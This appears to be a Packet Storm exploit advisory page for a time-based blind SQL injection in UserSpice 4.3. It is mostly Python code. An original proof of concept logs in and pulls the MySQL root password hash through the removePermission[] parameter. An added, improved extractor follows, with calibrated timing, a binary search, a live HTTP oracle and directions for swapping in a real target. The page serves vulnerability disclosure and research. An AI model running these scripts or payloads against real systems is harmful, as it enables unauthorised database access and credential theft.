
UserSpice 4.3 Blind SQL Injection

Published: 16 Feb 2018 | Reported by: Dolev Farhi | Type: packetstorm | Source: packetstormsecurity.com

Blind (time-based) SQL injection exploit for UserSpice 4.3 and earlier (https://userspice.com), a PHP user-management framework. Unsanitized input is passed to the removePermission parameter of the admin page handler (users/admin_page.php). The proof of concept below logs in with the configured credentials and then uses a conditional BENCHMARK() delay to extract the MySQL root password hash one character at a time.

Code
```python
#!/usr/bin/env python
"""
Application   UserSpice PHP user management
Vulnerability UserSpice <= 4.3 Blind SQL Injection exploit
URL           https://userspice.com
Date          1.2.2018
Author        Dolev Farhi

About the App:
What makes userspice different from almost any other PHP User Management
Framework is that it has been designed from the beginning to get out of
your way so you can spend your time working on your project

About the vulnerability:
Unsanitized input passed to removePermission parameter.
"""

import requests
import string
import sys

from bs4 import BeautifulSoup

userspice_host = '10.0.0.16'
userspice_user = 'admin'
userspice_pass = 'password'
userspice_login_url = 'http://%s/users/login.php' % userspice_host
userspice_vuln_url = 'http://%s/users/admin_page.php?id=75' % userspice_host
guess_chars = (string.ascii_lowercase + string.ascii_uppercase +
               string.digits + string.punctuation)

banner = """
-------------------------------------------------------
| userSpice <= 4.3 Blind SQL Injection Vulnerability  |
-------------------------------------------------------
"""

login_data = {
    'dest': '',
    'username': userspice_user,
    'password': userspice_pass
}

# Form fields of the admin page handler; removePermission[] is the
# injectable parameter.
payload = {
    'process': '1',
    'removePermission[]': '1',
    'private': 'Yes',
    'changeTitle': ''
}

s = requests.session()


def getCSRF(url):
    """Fetch the page and return its CSRF token (every POST needs a fresh one)."""
    req = s.get(url).text
    soup = BeautifulSoup(req, "lxml")
    csrf = soup.find('input', {"name": "csrf"})
    return csrf['value']


login_data['csrf'] = getCSRF(userspice_login_url)
req = s.post(userspice_login_url, data=login_data)

if 'login failed' in req.text.lower():
    print('Login failed, check username/password')
    sys.exit(1)

print(banner)
print('[+] Running...')
print('[+] Obtaining MySQL root hash... this may take some time.')
password = ""
# SUBSTRING() is 1-based; a MySQL 4.1+ hash is '*' plus 40 hex digits.
for i in range(1, 61):
    for c in guess_chars:
        payload['csrf'] = getCSRF(userspice_vuln_url)
        # Time-based oracle: when the guessed character is right, BENCHMARK()
        # burns CPU and the response arrives noticeably later. The guess is
        # placed inside single quotes, so a quote or backslash in the target
        # value would break the query (not an issue for hex hash characters).
        injection = ("5); SELECT 1 UNION SELECT IF(BINARY "
                     "SUBSTRING(password,{0},1)='{1}',BENCHMARK(3000000,SHA1(1)),0) "
                     "Password FROM mysql.user WHERE User = 'root'#;").format(i, c)
        payload['removePermission[]'] = injection
        elapsed = s.post(userspice_vuln_url, data=payload).elapsed.total_seconds()
        if elapsed > 0.6:
            password += c
            print('[+] %s' % password)
            break

print('done')
sys.exit(0)
```
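The PoC above tries every printable character in turn and compares each response time against a fixed 0.6 s cut-off, which is slow (up to 94 requests per character) and fragile on a noisy link. The block below is an added example, not code from the advisory or from the UserSpice project: it keeps the same oracle (a conditional BENCHMARK() in the removePermission[] field) but calibrates the threshold from measured baselines and binary-searches each character's code point, so a character costs at most seven requests. The form fields are taken from the PoC; the logged-in session, the CSRF helper and the simulated target are assumptions for the demonstration.

```python
"""Generalised time-based blind SQL injection extractor (added example).

Not code from the advisory above or from the UserSpice project: it keeps the
PoC's oracle (a conditional BENCHMARK() makes the request slow when a guess
is right) but calibrates the delay threshold from measured baselines and
binary-searches each character's code point instead of trying every
printable character.  Form fields and the simulated target are assumptions.
"""
import random
import re
import statistics
from typing import Callable

# An oracle takes an SQL condition and returns the request's elapsed seconds.
Oracle = Callable[[str], float]

# Payload shape from the advisory: close the vulnerable statement, then make
# a true condition cost CPU time.  Column is `password` on MySQL < 5.7
# (`authentication_string` on 5.7 and later).
PAYLOAD_TEMPLATE = (
    "5); SELECT 1 UNION SELECT IF({cond},BENCHMARK(3000000,SHA1(1)),0) "
    "Password FROM mysql.user WHERE User = 'root'#"
)


def char_condition(position: int, code: int, op: str) -> str:
    """Condition comparing the byte at 1-based `position` with code point `code`.

    BINARY forces a case-sensitive comparison; ORD('') is 0 past the end.
    """
    return f"ORD(BINARY SUBSTRING(password,{position},1)){op}{code}"


def calibrate(oracle: Oracle, samples: int = 5) -> float:
    """Delay threshold: midpoint between 'always false' and 'always true' medians."""
    fast = [oracle("1=2") for _ in range(samples)]
    slow = [oracle("1=1") for _ in range(samples)]
    return (statistics.median(fast) + statistics.median(slow)) / 2


def extract_char(oracle: Oracle, position: int, threshold: float) -> int:
    """Binary-search the code point (0..127) at `position`; 0 means end of string."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        # "Is the byte greater than mid?"  A slow response means yes.
        if oracle(char_condition(position, mid, ">")) > threshold:
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(oracle: Oracle, max_len: int = 64) -> str:
    """Recover the value one character at a time, stopping at the first NUL."""
    threshold = calibrate(oracle)
    out = ""
    for pos in range(1, max_len + 1):
        code = extract_char(oracle, pos, threshold)
        if code == 0:
            break
        out += chr(code)
    return out


def make_http_oracle(session, url: str, csrf_getter) -> Oracle:
    """Oracle against a live target, using the advisory's form fields.

    `session` is a requests.Session already logged in; `csrf_getter(url)`
    returns a fresh token (both assumed, as in the PoC).
    """
    def oracle(cond: str) -> float:
        data = {
            "process": "1",
            "removePermission[]": PAYLOAD_TEMPLATE.format(cond=cond),
            "private": "Yes",
            "changeTitle": "",
            "csrf": csrf_getter(url),
        }
        return session.post(url, data=data).elapsed.total_seconds()
    return oracle


def make_simulated_oracle(secret: str, delay: float = 0.5) -> Oracle:
    """Constructed stand-in for the vulnerable endpoint: evaluates the injected
    condition locally and returns a fake elapsed time (with jitter) without
    sleeping, so the example runs offline."""
    rng = random.Random(1)
    pat = re.compile(r"ORD\(BINARY SUBSTRING\(password,(\d+),1\)\)([<>=])(\d+)")

    def oracle(cond: str) -> float:
        if cond in ("1=1", "1=2"):
            truth = cond == "1=1"
        else:
            pos, op, val = pat.fullmatch(cond).groups()
            byte = ord(secret[int(pos) - 1]) if int(pos) <= len(secret) else 0
            truth = {"<": byte < int(val), ">": byte > int(val),
                     "=": byte == int(val)}[op]
        return 0.05 + rng.uniform(0, 0.05) + (delay if truth else 0.0)
    return oracle


if __name__ == "__main__":
    # Constructed secret; a real MySQL hash would be '*' plus 40 hex digits.
    print(extract(make_simulated_oracle("*S3cr3t-H4sh!")))
```

Against a real target, swap `make_simulated_oracle` for `make_http_oracle(session, userspice_vuln_url, getCSRF)` after logging in as the PoC does. Calibrating from both a known-false and a known-true condition, rather than trusting a hard-coded 0.6 s, is what keeps the oracle reliable when the server or the network is busy; if the two medians are close, the BENCHMARK iteration count needs raising before extraction is attempted.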

Vulners AI Score: 7.1 (High risk)